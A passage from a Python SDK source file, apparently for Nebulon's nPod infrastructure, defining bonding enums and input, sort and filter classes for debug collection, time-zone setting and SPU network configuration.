\"UpdateNPodMembersInput\",\n \"UpdateImmutableBootInput\",\n \"NPodsMixin\"\n]\n\n\n# TODO: Move these enums to the SPU space\nclass BondTransmitHashPolicy(NebEnum):\n \"\"\"Transmit has policy used by link aggregation\n\n Allows selecting the algorithm for child interface selection according to\n the specified TCP/IP Layer.\n \"\"\"\n\n TransmitHashPolicyLayer2 = \"TransmitHashPolicyLayer2\"\n \"\"\"\n Uses the physical interface MAC address for interface selection\n \"\"\"\n\n TransmitHashPolicyLayer34 = \"TransmitHashPolicyLayer34\"\n \"\"\"\n Uses the layer 3 and 4 protocol data for interface selection\n \"\"\"\n\n TransmitHashPolicyLayer23 = \"TransmitHashPolicyLayer23\"\n \"\"\"\n Uses the layer 2 and 3 protocol data for interface selection\n \"\"\"\n\n\nclass BondLACPTransmitRate(NebEnum):\n \"\"\"Link aggregation transmit rate for LACP\n\n Allows configuration of the LACP rate - how frequently the LACP partner\n should transmit LACPDUs (Link Aggregation Control Protocol Data Units).\n \"\"\"\n\n LACPTransmitRateSlow = \"LACPTransmitRateSlow\"\n \"\"\"\n Send LACPDUs every thirty seconds\n \"\"\"\n\n LACPTransmitRateFast = \"LACPTransmitRateFast\"\n \"\"\"\n Send LACPDUs every one second\n \"\"\"\n\n\nclass BondType(NebEnum):\n \"\"\"Link aggregation type for data ports\n\n Allows selecting the link aggregation mode for data network interfaces.\n \"\"\"\n\n BondModeNone = \"BondModeNone\"\n \"\"\"\n No link aggregation. Both data ports communicate independently on their\n own networks. NebOS will internally manage failover between the interfaces.\n \"\"\"\n\n BondMode8023ad = \"BondMode8023ad\"\n \"\"\"\n Use LACP (IEEE 802.3ad) for link aggregation.\n \"\"\"\n\n\nclass DebugInfoInput:\n \"\"\"Allows collecting debug information of infrastructure on demand\n\n This input class is used in the collect_debug_info method that will collect\n verbose debug and troubleshooting information from the specified resource.\n This information is used during support case troubleshooting.\n \"\"\"\n\n def __init__(\n self,\n npod_uuid: str = None,\n spu_serial: str = None,\n note: str = None,\n support_case_number: str = None\n ):\n \"\"\"Constructs a new input object to collect debug information\n\n This input class is used in the collect_debug_info method that will\n collect verbose debug and troubleshooting information from the\n specified resource. This information is used during support case\n troubleshooting.\n\n One of ``npod_uuid`` or ``spu_serial`` must be specified as the target\n of information collection. If a nPod UUID is specified, information is\n collected from all SPUs in the nPod. If a SPU serial number is used,\n only information of the SPU is collected.\n\n Users can add additional information to the debug information through\n the use of the ``note`` parameter. As an example, users can add\n additional comments about observed behavior in this field.\n\n If the collection of debug information is done as part of an active\n support case, users are encouraged to populate the\n ``support_case_number`` parameter to associate the submitted information\n directly with the support case.\n\n :param npod_uuid: The unique identifier of the nPod from which to\n collect debug and troubleshooting information\n :type npod_uuid: str, optional\n :param spu_serial: The serial number of a services processing unit from\n which to collect debug and troubleshooting information\n :type spu_serial: str, optional\n :param note: An optional note for the submitted data that will be made\n accessible to nebulon customer satisfaction and engineering that is\n reviewing the debug and troubleshooting information\n :type note: str, optional\n :param support_case_number: An optional support case number. If the\n information collection is related to an active support case, users\n are encouraged to supply the associated support case number.\n :type support_case_number: str, optional\n \"\"\"\n\n self.__npod_uuid = npod_uuid\n self.__spu_serial = spu_serial\n self.__note = note\n self.__support_case_number = support_case_number\n\n @property\n def npod_uuid(self) -> str:\n \"\"\"The unique identifier of the nPod from which to collect data\"\"\"\n return self.__npod_uuid\n\n @property\n def spu_serial(self) -> str:\n \"\"\"The serial number the SPU from which to collect data\"\"\"\n return self.__spu_serial\n\n @property\n def note(self) -> str:\n \"\"\"An optional note to submit with the debug information\"\"\"\n return self.__note\n\n @property\n def support_case_number(self) -> str:\n \"\"\"An optional support case number related to this data collection\"\"\"\n return self.__support_case_number\n\n @property\n def as_dict(self) -> dict:\n result = {\n \"nPodUUID\": self.npod_uuid,\n \"spuSerial\": self.spu_serial,\n \"note\": self.note,\n \"supportCaseNumber\": self.support_case_number\n }\n return result\n\n\nclass SetNPodTimeZoneInput:\n \"\"\"Allows setting the timezone of an nPod or SPU\n\n Possible timezones include:\n\n * ``Africa/Abidjan``\n * ``Africa/Accra``\n * ``Africa/Addis_Ababa``\n * ``Africa/Algiers``\n * ``Africa/Asmara``\n * ``Africa/Asmera``\n * ``Africa/Bamako``\n * ``Africa/Bangui``\n * ``Africa/Banjul``\n * ``Africa/Bissau``\n * ``Africa/Blantyre``\n * ``Africa/Brazzaville``\n * ``Africa/Bujumbura``\n * ``Africa/Cairo``\n * ``Africa/Casablanca``\n * ``Africa/Ceuta``\n * ``Africa/Conakry``\n * ``Africa/Dakar``\n * ``Africa/Dar_es_Salaam``\n * ``Africa/Djibouti``\n * ``Africa/Douala``\n * ``Africa/El_Aaiun``\n * ``Africa/Freetown``\n * ``Africa/Gaborone``\n * ``Africa/Harare``\n * ``Africa/Johannesburg``\n * ``Africa/Juba``\n * ``Africa/Kampala``\n * ``Africa/Khartoum``\n * ``Africa/Kigali``\n * ``Africa/Kinshasa``\n * ``Africa/Lagos``\n * ``Africa/Libreville``\n * ``Africa/Lome``\n * ``Africa/Luanda``\n * ``Africa/Lubumbashi``\n * ``Africa/Lusaka``\n * ``Africa/Malabo``\n * ``Africa/Maputo``\n * ``Africa/Maseru``\n * ``Africa/Mbabane``\n * ``Africa/Mogadishu``\n * ``Africa/Monrovia``\n * ``Africa/Nairobi``\n * ``Africa/Ndjamena``\n * ``Africa/Niamey``\n * ``Africa/Nouakchott``\n * ``Africa/Ouagadougou``\n * ``Africa/Porto-Novo``\n * ``Africa/Sao_Tome``\n * ``Africa/Timbuktu``\n * ``Africa/Tripoli``\n * ``Africa/Tunis``\n * ``Africa/Windhoek``\n * ``America/Adak``\n * ``America/Anchorage``\n * ``America/Anguilla``\n * ``America/Antigua``\n * ``America/Araguaina``\n * ``America/Argentina/Buenos_Aires``\n * ``America/Argentina/Catamarca``\n * ``America/Argentina/ComodRivadavia``\n * ``America/Argentina/Cordoba``\n * ``America/Argentina/Jujuy``\n * ``America/Argentina/La_Rioja``\n * ``America/Argentina/Mendoza``\n * ``America/Argentina/Rio_Gallegos``\n * ``America/Argentina/Salta``\n * ``America/Argentina/San_Juan``\n * ``America/Argentina/San_Luis``\n * ``America/Argentina/Tucuman``\n * ``America/Argentina/Ushuaia``\n * ``America/Aruba``\n * ``America/Asuncion``\n * ``America/Atikokan``\n * ``America/Atka``\n * ``America/Bahia``\n * ``America/Bahia_Banderas``\n * ``America/Barbados``\n * ``America/Belem``\n * ``America/Belize``\n * ``America/Blanc-Sablon``\n * ``America/Boa_Vista``\n * ``America/Bogota``\n * ``America/Boise``\n * ``America/Buenos_Aires``\n * ``America/Cambridge_Bay``\n * ``America/Campo_Grande``\n * ``America/Cancun``\n * ``America/Caracas``\n * ``America/Catamarca``\n * ``America/Cayenne``\n * ``America/Cayman``\n * ``America/Chicago``\n * ``America/Chihuahua``\n * ``America/Coral_Harbour``\n * ``America/Cordoba``\n * ``America/Costa_Rica``\n * ``America/Creston``\n * ``America/Cuiaba``\n * ``America/Curacao``\n * ``America/Danmarkshavn``\n * ``America/Dawson``\n * ``America/Dawson_Creek``\n * ``America/Denver``\n * ``America/Detroit``\n * ``America/Dominica``\n * ``America/Edmonton``\n * ``America/Eirunepe``\n * ``America/El_Salvador``\n * ``America/Ensenada``\n * ``America/Fort_Nelson``\n * ``America/Fort_Wayne``\n * ``America/Fortaleza``\n * ``America/Glace_Bay``\n * ``America/Godthab``\n * ``America/Goose_Bay``\n * ``America/Grand_Turk``\n * ``America/Grenada``\n * ``America/Guadeloupe``\n * ``America/Guatemala``\n * ``America/Guayaquil``\n * ``America/Guyana``\n * ``America/Halifax``\n * ``America/Havana``\n * ``America/Hermosillo``\n * ``America/Indiana/Indianapolis``\n * ``America/Indiana/Knox``\n * ``America/Indiana/Marengo``\n * ``America/Indiana/Petersburg``\n * ``America/Indiana/Tell_City``\n * ``America/Indiana/Vevay``\n * ``America/Indiana/Vincennes``\n * ``America/Indiana/Winamac``\n * ``America/Indianapolis``\n * ``America/Inuvik``\n * ``America/Iqaluit``\n * ``America/Jamaica``\n * ``America/Jujuy``\n * ``America/Juneau``\n * ``America/Kentucky/Louisville``\n * ``America/Kentucky/Monticello``\n * ``America/Knox_IN``\n * ``America/Kralendijk``\n * ``America/La_Paz``\n * ``America/Lima``\n * ``America/Los_Angeles``\n * ``America/Louisville``\n * ``America/Lower_Princes``\n * ``America/Maceio``\n * ``America/Managua``\n * ``America/Manaus``\n * ``America/Marigot``\n * ``America/Martinique``\n * ``America/Matamoros``\n * ``America/Mazatlan``\n * ``America/Mendoza``\n * ``America/Menominee``\n * ``America/Merida``\n * ``America/Metlakatla``\n * ``America/Mexico_City``\n * ``America/Miquelon``\n * ``America/Moncton``\n * ``America/Monterrey``\n * ``America/Montevideo``\n * ``America/Montreal``\n * ``America/Montserrat``\n * ``America/Nassau``\n * ``America/New_York``\n * ``America/Nipigon``\n * ``America/Nome``\n * ``America/Noronha``\n * ``America/North_Dakota/Beulah``\n * ``America/North_Dakota/Center``\n * ``America/North_Dakota/New_Salem``\n * ``America/Nuuk``\n * ``America/Ojinaga``\n * ``America/Panama``\n * ``America/Pangnirtung``\n * ``America/Paramaribo``\n * ``America/Phoenix``\n * ``America/Port-au-Prince``\n * ``America/Port_of_Spain``\n * ``America/Porto_Acre``\n * ``America/Porto_Velho``\n * ``America/Puerto_Rico``\n * ``America/Punta_Arenas``\n * ``America/Rainy_River``\n * ``America/Rankin_Inlet``\n * ``America/Recife``\n * ``America/Regina``\n * ``America/Resolute``\n * ``America/Rio_Branco``\n * ``America/Rosario``\n * ``America/Santa_Isabel``\n * ``America/Santarem``\n * ``America/Santiago``\n * ``America/Santo_Domingo``\n * ``America/Sao_Paulo``\n * ``America/Scoresbysund``\n * ``America/Shiprock``\n * ``America/Sitka``\n * ``America/St_Barthelemy``\n * ``America/St_Johns``\n * ``America/St_Kitts``\n * ``America/St_Lucia``\n * ``America/St_Thomas``\n * ``America/St_Vincent``\n * ``America/Swift_Current``\n * ``America/Tegucigalpa``\n * ``America/Thule``\n * ``America/Thunder_Bay``\n * ``America/Tijuana``\n * ``America/Toronto``\n * ``America/Tortola``\n * ``America/Vancouver``\n * ``America/Virgin``\n * ``America/Whitehorse``\n * ``America/Winnipeg``\n * ``America/Yakutat``\n * ``America/Yellowknife``\n * ``Antarctica/Casey``\n * ``Antarctica/Davis``\n * ``Antarctica/DumontDUrville``\n * ``Antarctica/Macquarie``\n * ``Antarctica/Mawson``\n * ``Antarctica/McMurdo``\n * ``Antarctica/Palmer``\n * ``Antarctica/Rothera``\n * ``Antarctica/South_Pole``\n * ``Antarctica/Syowa``\n * ``Antarctica/Troll``\n * ``Antarctica/Vostok``\n * ``Arctic/Longyearbyen``\n * ``Asia/Aden``\n * ``Asia/Almaty``\n * ``Asia/Amman``\n * ``Asia/Anadyr``\n * ``Asia/Aqtau``\n * ``Asia/Aqtobe``\n * ``Asia/Ashgabat``\n * ``Asia/Ashkhabad``\n * ``Asia/Atyrau``\n * ``Asia/Baghdad``\n * ``Asia/Bahrain``\n * ``Asia/Baku``\n * ``Asia/Bangkok``\n * ``Asia/Barnaul``\n * ``Asia/Beirut``\n * ``Asia/Bishkek``\n * ``Asia/Brunei``\n * ``Asia/Calcutta``\n * ``Asia/Chita``\n * ``Asia/Choibalsan``\n * ``Asia/Chongqing``\n * ``Asia/Chungking``\n * ``Asia/Colombo``\n * ``Asia/Dacca``\n * ``Asia/Damascus``\n * ``Asia/Dhaka``\n * ``Asia/Dili``\n * ``Asia/Dubai``\n * ``Asia/Dushanbe``\n * ``Asia/Famagusta``\n * ``Asia/Gaza``\n * ``Asia/Harbin``\n * ``Asia/Hebron``\n * ``Asia/Ho_Chi_Minh``\n * ``Asia/Hong_Kong``\n * ``Asia/Hovd``\n * ``Asia/Irkutsk``\n * ``Asia/Istanbul``\n * ``Asia/Jakarta``\n * ``Asia/Jayapura``\n * ``Asia/Jerusalem``\n * ``Asia/Kabul``\n * ``Asia/Kamchatka``\n * ``Asia/Karachi``\n * ``Asia/Kashgar``\n * ``Asia/Kathmandu``\n * ``Asia/Katmandu``\n * ``Asia/Khandyga``\n * ``Asia/Kolkata``\n * ``Asia/Krasnoyarsk``\n * ``Asia/Kuala_Lumpur``\n * ``Asia/Kuching``\n * ``Asia/Kuwait``\n * ``Asia/Macao``\n * ``Asia/Macau``\n * ``Asia/Magadan``\n * ``Asia/Makassar``\n * ``Asia/Manila``\n * ``Asia/Muscat``\n * ``Asia/Nicosia``\n * ``Asia/Novokuznetsk``\n * ``Asia/Novosibirsk``\n * ``Asia/Omsk``\n * ``Asia/Oral``\n * ``Asia/Phnom_Penh``\n * ``Asia/Pontianak``\n * ``Asia/Pyongyang``\n * ``Asia/Qatar``\n * ``Asia/Qostanay``\n * ``Asia/Qyzylorda``\n * ``Asia/Rangoon``\n * ``Asia/Riyadh``\n * ``Asia/Saigon``\n * ``Asia/Sakhalin``\n * ``Asia/Samarkand``\n * ``Asia/Seoul``\n * ``Asia/Shanghai``\n * ``Asia/Singapore``\n * ``Asia/Srednekolymsk``\n * ``Asia/Taipei``\n * ``Asia/Tashkent``\n * ``Asia/Tbilisi``\n * ``Asia/Tehran``\n * ``Asia/Tel_Aviv``\n * ``Asia/Thimbu``\n * ``Asia/Thimphu``\n * ``Asia/Tokyo``\n * ``Asia/Tomsk``\n * ``Asia/Ujung_Pandang``\n * ``Asia/Ulaanbaatar``\n * ``Asia/Ulan_Bator``\n * ``Asia/Urumqi``\n * ``Asia/Ust-Nera``\n * ``Asia/Vientiane``\n * ``Asia/Vladivostok``\n * ``Asia/Yakutsk``\n * ``Asia/Yangon``\n * ``Asia/Yekaterinburg``\n * ``Asia/Yerevan``\n * ``Atlantic/Azores``\n * ``Atlantic/Bermuda``\n * ``Atlantic/Canary``\n * ``Atlantic/Cape_Verde``\n * ``Atlantic/Faeroe``\n * ``Atlantic/Faroe``\n * ``Atlantic/Jan_Mayen``\n * ``Atlantic/Madeira``\n * ``Atlantic/Reykjavik``\n * ``Atlantic/South_Georgia``\n * ``Atlantic/St_Helena``\n * ``Atlantic/Stanley``\n * ``Australia/ACT``\n * ``Australia/Adelaide``\n * ``Australia/Brisbane``\n * ``Australia/Broken_Hill``\n * ``Australia/Canberra``\n * ``Australia/Currie``\n * ``Australia/Darwin``\n * ``Australia/Eucla``\n * ``Australia/Hobart``\n * ``Australia/LHI``\n * ``Australia/Lindeman``\n * ``Australia/Lord_Howe``\n * ``Australia/Melbourne``\n * ``Australia/NSW``\n * ``Australia/North``\n * ``Australia/Perth``\n * ``Australia/Queensland``\n * ``Australia/South``\n * ``Australia/Sydney``\n * ``Australia/Tasmania``\n * ``Australia/Victoria``\n * ``Australia/West``\n * ``Australia/Yancowinna``\n * ``Brazil/Acre``\n * ``Brazil/DeNoronha``\n * ``Brazil/East``\n * ``Brazil/West``\n * ``CET``\n * ``CST6CDT``\n * ``Canada/Atlantic``\n * ``Canada/Central``\n * ``Canada/Eastern``\n * ``Canada/Mountain``\n * ``Canada/Newfoundland``\n * ``Canada/Pacific``\n * ``Canada/Saskatchewan``\n * ``Canada/Yukon``\n * ``Chile/Continental``\n * ``Chile/EasterIsland``\n * ``Cuba``\n * ``EET``\n * ``EST``\n * ``EST5EDT``\n * ``Egypt``\n * ``Eire``\n * ``Etc/GMT``\n * ``Etc/GMT+0``\n * ``Etc/GMT+1``\n * ``Etc/GMT+10``\n * ``Etc/GMT+11``\n * ``Etc/GMT+12``\n * ``Etc/GMT+2``\n * ``Etc/GMT+3``\n * ``Etc/GMT+4``\n * ``Etc/GMT+5``\n * ``Etc/GMT+6``\n * ``Etc/GMT+7``\n * ``Etc/GMT+8``\n * ``Etc/GMT+9``\n * ``Etc/GMT-0``\n * ``Etc/GMT-1``\n * ``Etc/GMT-10``\n * ``Etc/GMT-11``\n * ``Etc/GMT-12``\n * ``Etc/GMT-13``\n * ``Etc/GMT-14``\n * ``Etc/GMT-2``\n * ``Etc/GMT-3``\n * ``Etc/GMT-4``\n * ``Etc/GMT-5``\n * ``Etc/GMT-6``\n * ``Etc/GMT-7``\n * ``Etc/GMT-8``\n * ``Etc/GMT-9``\n * ``Etc/GMT0``\n * ``Etc/Greenwich``\n * ``Etc/UCT``\n * ``Etc/UTC``\n * ``Etc/Universal``\n * ``Etc/Zulu``\n * ``Europe/Amsterdam``\n * ``Europe/Andorra``\n * ``Europe/Astrakhan``\n * ``Europe/Athens``\n * ``Europe/Belfast``\n * ``Europe/Belgrade``\n * ``Europe/Berlin``\n * ``Europe/Bratislava``\n * ``Europe/Brussels``\n * ``Europe/Bucharest``\n * ``Europe/Budapest``\n * ``Europe/Busingen``\n * ``Europe/Chisinau``\n * ``Europe/Copenhagen``\n * ``Europe/Dublin``\n * ``Europe/Gibraltar``\n * ``Europe/Guernsey``\n * ``Europe/Helsinki``\n * ``Europe/Isle_of_Man``\n * ``Europe/Istanbul``\n * ``Europe/Jersey``\n * ``Europe/Kaliningrad``\n * ``Europe/Kiev``\n * ``Europe/Kirov``\n * ``Europe/Lisbon``\n * ``Europe/Ljubljana``\n * ``Europe/London``\n * ``Europe/Luxembourg``\n * ``Europe/Madrid``\n * ``Europe/Malta``\n * ``Europe/Mariehamn``\n * ``Europe/Minsk``\n * ``Europe/Monaco``\n * ``Europe/Moscow``\n * ``Europe/Nicosia``\n * ``Europe/Oslo``\n * ``Europe/Paris``\n * ``Europe/Podgorica``\n * ``Europe/Prague``\n * ``Europe/Riga``\n * ``Europe/Rome``\n * ``Europe/Samara``\n * ``Europe/San_Marino``\n * ``Europe/Sarajevo``\n * ``Europe/Saratov``\n * ``Europe/Simferopol``\n * ``Europe/Skopje``\n * ``Europe/Sofia``\n * ``Europe/Stockholm``\n * ``Europe/Tallinn``\n * ``Europe/Tirane``\n * ``Europe/Tiraspol``\n * ``Europe/Ulyanovsk``\n * ``Europe/Uzhgorod``\n * ``Europe/Vaduz``\n * ``Europe/Vatican``\n * ``Europe/Vienna``\n * ``Europe/Vilnius``\n * ``Europe/Volgograd``\n * ``Europe/Warsaw``\n * ``Europe/Zagreb``\n * ``Europe/Zaporozhye``\n * ``Europe/Zurich``\n * ``Factory``\n * ``GB``\n * ``GB-Eire``\n * ``GMT``\n * ``GMT+0``\n * ``GMT-0``\n * ``GMT0``\n * ``Greenwich``\n * ``HST``\n * ``Hongkong``\n * ``Iceland``\n * ``Indian/Antananarivo``\n * ``Indian/Chagos``\n * ``Indian/Christmas``\n * ``Indian/Cocos``\n * ``Indian/Comoro``\n * ``Indian/Kerguelen``\n * ``Indian/Mahe``\n * ``Indian/Maldives``\n * ``Indian/Mauritius``\n * ``Indian/Mayotte``\n * ``Indian/Reunion``\n * ``Iran``\n * ``Israel``\n * ``Jamaica``\n * ``Japan``\n * ``Kwajalein``\n * ``Libya``\n * ``MET``\n * ``MST``\n * ``MST7MDT``\n * ``Mexico/BajaNorte``\n * ``Mexico/BajaSur``\n * ``Mexico/General``\n * ``NZ``\n * ``NZ-CHAT``\n * ``Navajo``\n * ``PRC``\n * ``PST8PDT``\n * ``Pacific/Apia``\n * ``Pacific/Auckland``\n * ``Pacific/Bougainville``\n * ``Pacific/Chatham``\n * ``Pacific/Chuuk``\n * ``Pacific/Easter``\n * ``Pacific/Efate``\n * ``Pacific/Enderbury``\n * ``Pacific/Fakaofo``\n * ``Pacific/Fiji``\n * ``Pacific/Funafuti``\n * ``Pacific/Galapagos``\n * ``Pacific/Gambier``\n * ``Pacific/Guadalcanal``\n * ``Pacific/Guam``\n * ``Pacific/Honolulu``\n * ``Pacific/Johnston``\n * ``Pacific/Kiritimati``\n * ``Pacific/Kosrae``\n * ``Pacific/Kwajalein``\n * ``Pacific/Majuro``\n * ``Pacific/Marquesas``\n * ``Pacific/Midway``\n * ``Pacific/Nauru``\n * ``Pacific/Niue``\n * ``Pacific/Norfolk``\n * ``Pacific/Noumea``\n * ``Pacific/Pago_Pago``\n * ``Pacific/Palau``\n * ``Pacific/Pitcairn``\n * ``Pacific/Pohnpei``\n * ``Pacific/Ponape``\n * ``Pacific/Port_Moresby``\n * ``Pacific/Rarotonga``\n * ``Pacific/Saipan``\n * ``Pacific/Samoa``\n * ``Pacific/Tahiti``\n * ``Pacific/Tarawa``\n * ``Pacific/Tongatapu``\n * ``Pacific/Truk``\n * ``Pacific/Wake``\n * ``Pacific/Wallis``\n * ``Pacific/Yap``\n * ``Poland``\n * ``Portugal``\n * ``ROC``\n * ``ROK``\n * ``Singapore``\n * ``Turkey``\n * ``UCT``\n * ``US/Alaska``\n * ``US/Aleutian``\n * ``US/Arizona``\n * ``US/Central``\n * ``US/East-Indiana``\n * ``US/Eastern``\n * ``US/Hawaii``\n * ``US/Indiana-Starke``\n * ``US/Michigan``\n * ``US/Mountain``\n * ``US/Pacific``\n * ``US/Samoa``\n * ``UTC``\n * ``Universal``\n * ``W-SU``\n * ``WET``\n * ``Zulu``\n \"\"\"\n\n def __init__(\n self,\n time_zone: str\n ):\n \"\"\"Constructs a new input object to set timezone\n\n :param time_zone: The time zone to set as a timezone string\n :type time_zone: str\n \"\"\"\n\n self.__time_zone = time_zone\n\n @property\n def time_zone(self) -> str:\n \"\"\"The time zone to set\"\"\"\n return self.__time_zone\n\n @property\n def as_dict(self):\n result = dict()\n result[\"timeZone\"] = self.time_zone\n return result\n\n\nclass NPodSort:\n \"\"\"A sort object for nPods\n\n Allows sorting nPods on common properties. The sort object allows\n only one property to be specified.\n \"\"\"\n\n def __init__(\n self,\n name: SortDirection = None\n ):\n \"\"\"Constructs a new sort object for nPods\n\n :param name: Sort direction for the ``name`` property\n :type name: SortDirection, optional\n \"\"\"\n\n self.__name = name\n\n @property\n def name(self) -> SortDirection:\n \"\"\"Sort direction for the ``name`` property\"\"\"\n return self.__name\n\n @property\n def as_dict(self):\n result = dict()\n result[\"name\"] = self.name\n return result\n\n\nclass NPodFilter:\n \"\"\"A filter object to filter nPods.\n\n Allows filtering for specific nPods in nebulon ON. The\n filter allows only one property to be specified. If filtering on multiple\n properties is needed, use the ``and_filter`` and ``or_filter`` options to\n concatenate multiple filters.\n \"\"\"\n\n def __init__(\n self,\n uuid: UUIDFilter = None,\n name: StringFilter = None,\n npod_group_uuid: UUIDFilter = None,\n npod_template_uuid: UUIDFilter = None,\n npod_base_template_uuid: UUIDFilter = None,\n spu_serial: StringFilter = None,\n and_filter=None,\n or_filter=None\n ):\n \"\"\"Constructs a new filter object\n\n :param uuid: Filter based on nPod unique identifiers\n :type uuid: UUIDFilter, optional\n :param name: Filter based on nPod name\n :type name: StringFilter, optional\n :param npod_group_uuid: Filter based on the nPod group unique identifier\n :type npod_group_uuid: UUIDFilter, optional\n :param npod_template_uuid: Filter based on the nPod template associated\n with the nPod\n :type npod_template_uuid: UUIDFilter, optional\n :param npod_base_template_uuid: Filter based on the base nPod template\n associated with the nPod\n :type npod_base_template_uuid: UUIDFilter, optional\n :param spu_serial: Filter based on a SPU serial number that is part of\n the nPod\n :type spu_serial: StringFilter, optional\n :param and_filter: Concatenate another filter with a logical AND\n :type and_filter: DataCenterFilter, optional\n :param or_filter: Concatenate another filter with a logical OR\n :type or_filter: DataCenterFilter, optional\n \"\"\"\n\n self.__uuid = uuid\n self.__name = name\n self.__npod_group_uuid = npod_group_uuid\n self.__npod_template_uuid = npod_template_uuid\n self.__npod_base_template_uuid = npod_base_template_uuid\n self.__spu_serial = spu_serial\n self.__and = and_filter\n self.__or = or_filter\n\n @property\n def uuid(self) -> UUIDFilter:\n \"\"\"Filter based on nPod unique identifiers\"\"\"\n return self.__uuid\n\n @property\n def name(self) -> StringFilter:\n \"\"\"Filter based on nPod name\"\"\"\n return self.__name\n\n @property\n def npod_group_uuid(self) -> UUIDFilter:\n \"\"\"Filter based on the nPod group unique identifier\"\"\"\n return self.__npod_group_uuid\n\n @property\n def npod_template_uuid(self) -> UUIDFilter:\n \"\"\"Filter based on the nPod template associated with the nPod\"\"\"\n return self.__npod_template_uuid\n\n @property\n def npod_base_template_uuid(self) -> UUIDFilter:\n \"\"\"Filter based on the base nPod template associated with the nPod\"\"\"\n return self.__npod_base_template_uuid\n\n @property\n def spu_serial(self) -> StringFilter:\n \"\"\"Filter based on a SPU serial number that is part of the nPod\"\"\"\n return self.__spu_serial\n\n @property\n def and_filter(self):\n \"\"\"Allows concatenation of multiple filters via logical AND\"\"\"\n return self.__and\n\n @property\n def or_filter(self):\n \"\"\"Allows concatenation of multiple filters via logical OR\"\"\"\n return self.__or\n\n @property\n def as_dict(self):\n result = dict()\n result[\"uuid\"] = self.uuid\n result[\"name\"] = self.name\n result[\"nPodGroupUUID\"] = self.npod_group_uuid\n result[\"nPodTemplateUUID\"] = self.npod_template_uuid\n result[\"nPodBaseTemplateUUID\"] = self.npod_base_template_uuid\n result[\"spuSerial\"] = self.spu_serial\n result[\"and\"] = self.and_filter\n result[\"or\"] = self.or_filter\n return result\n\n\nclass IPInfoConfigInput:\n \"\"\"An input object to configure SPU networking\n\n SPU network configuration is determined at nPod creation. Customers have\n the option to use static IP addresses for the data network or DHCP.\n When using DHCP, it is recommended to use static IP reservations for the\n data networks.\n\n Customers can choose between using two separate networks for the data\n network or a link aggregation. When using link aggregation, two\n interface names are expected, one if not.\n\n When specifying an IP address, it can be either IPv4 or IPv6 and supports\n the CIDR address format.\n \"\"\"\n\n def __init__(\n self,\n dhcp: bool,\n bond_mode: BondType,\n interfaces: List[str],\n address: str = \"\",\n netmask_bits: int = 0,\n gateway: str = \"\",\n half_duplex: bool = False,\n speed_mb: int = 0,\n locked_speed: bool = False,\n mtu: int = 1500,\n bond_transmit_hash_policy: BondTransmitHashPolicy = None,\n bond_mii_monitor_ms: int = None,\n bond_lacp_transmit_rate: BondLACPTransmitRate = None\n ):\n \"\"\"Constructs a new input object for configuring SPU network config\n\n :param dhcp: Specifies if DHCP should be used for the data network. If\n set to ``True``, fields ``address``, ``netmask_bits``, ``gateway``\n should not be specified. If set to ``False``, these values become\n mandatory.\n :type dhcp: bool\n :param bond_mode: Specifies the link aggregation mode for the data\n network ports. If not set to ``None``, the ``interfaces`` parameter\n must be an array that lists the names of both interfaces:\n ``['enP8p1s0f0np0', 'enP8p1s0f1np1']``, if set to ``None`` the\n specific interface must be identified by its name.\n :type bond_mode: BondType\n :param interfaces: List of interfaces that shall be configured with\n this object. If ``bond_mode`` is set to ``None`` a single interface\n shall be specified. If set to a link aggregation mode both data\n interface names shall be specified. Options are `enP8p1s0f0np0` and\n `enP8p1s0f1np1`.\n :type interfaces: List[str]\n :param address: The IPv4 or IPv6 address for the data network interface.\n If CIDR format is used, the ``netmask_bits`` value is ignored. If\n ``dhcp`` is set to ``True``, this field must not be specified.\n :type address: str, optional\n :param netmask_bits: The network mask in bits. If ``address`` is\n specified in CIDR format, this value will be ignored, otherwise\n this is a mandatory field.\n :type netmask_bits: int, optional\n :param gateway: The network gateway address for the network interface.\n If ``dhcp`` is set to ``True`` this field is optional and ignored.\n If static IP address is used, this field is mandatory.\n :type gateway: str, optional\n :param half_duplex: Specifies if the network interface shall use\n half duplex. By default, this field is set to ``False`` and is the\n recommended setting.\n :type half_duplex: bool, optional\n :param speed_mb: Allows setting the interface speed to a specific\n value. This field is ignored when ``locked_speed`` is set to\n ``False`` (default). It is not recommended to set this value.\n :type speed_mb: int, optional\n :param locked_speed: Allows setting the interface speed and the\n duplex mode to specific values. If set to ``True`` the values of\n ``speed_mb`` and ``half_duplex`` are enforced. It is recommended to\n set this value to ``False``.\n :type locked_speed: bool, optional\n :param mtu: Allows setting the maximum transfer unit (MTU) for the\n interface. By default an MTU of `1500` is used.\n :type mtu: int, optional\n :param bond_transmit_hash_policy: Allows specifying the transmit hashing\n policy mode when using link aggregation. This field is ignored when\n ``bond_mode`` is set to ``None``.\n :type bond_transmit_hash_policy: BondTransmitHashPolicy, optional\n :param bond_mii_monitor_ms: Allows altering the default media\n independent interface monitoring interval. This field is ignored\n when ``bond_mode`` is set to ``None``.\n :type bond_mii_monitor_ms: int, optional\n :param bond_lacp_transmit_rate: Allows altering the default LACP\n transmit rate. This field is ignored if ``bond_mode`` is not set to\n `BondMode8023ad`.\n :type bond_lacp_transmit_rate: BondLACPTransmitRate, optional\n \"\"\"\n\n self.__dhcp = dhcp\n self.__address = address\n self.__netmask_bits = netmask_bits\n self.__gateway = gateway\n self.__bond_mode = bond_mode\n self.__bond_transmit_hash_policy = bond_transmit_hash_policy\n self.__bond_mii_monitor_ms = bond_mii_monitor_ms\n self.__bond_lacp_transmit_rate = bond_lacp_transmit_rate\n self.__interfaces = interfaces\n self.__half_duplex = half_duplex\n self.__speed_mb = speed_mb\n self.__locked_speed = locked_speed\n self.__mtu = mtu\n\n @property\n def dhcp(self) -> bool:\n \"\"\"Specifies if DHCP should be used for the data network.\"\"\"\n return self.__dhcp\n\n @property\n def address(self) -> str:\n \"\"\"IPv4 or IPv6 address if static IP address is used\"\"\"\n return self.__address\n\n @property\n def netmask_bits(self) -> int:\n \"\"\"Netmask in bits if static IP address is used\"\"\"\n return self.__netmask_bits\n\n @property\n def gateway(self) -> str:\n \"\"\"Gateway IP address if static IP address is used\"\"\"\n return self.__gateway\n\n @property\n def bond_mode(self) -> BondType:\n \"\"\"Link aggregation mode for the data interfaces\"\"\"\n return self.__bond_mode\n\n @property\n def bond_transmit_hash_policy(self) -> BondTransmitHashPolicy:\n \"\"\"Allows specifying the transmit hashing policy\"\"\"\n return self.__bond_transmit_hash_policy\n\n @property\n def bond_mii_monitor_ms(self) -> int:\n \"\"\"Allows specifying the MII monitor interval\"\"\"\n return self.__bond_mii_monitor_ms\n\n @property\n def bond_lacp_transmit_rate(self) -> BondLACPTransmitRate:\n \"\"\"Allows specifying the LACP transmit rate\"\"\"\n return 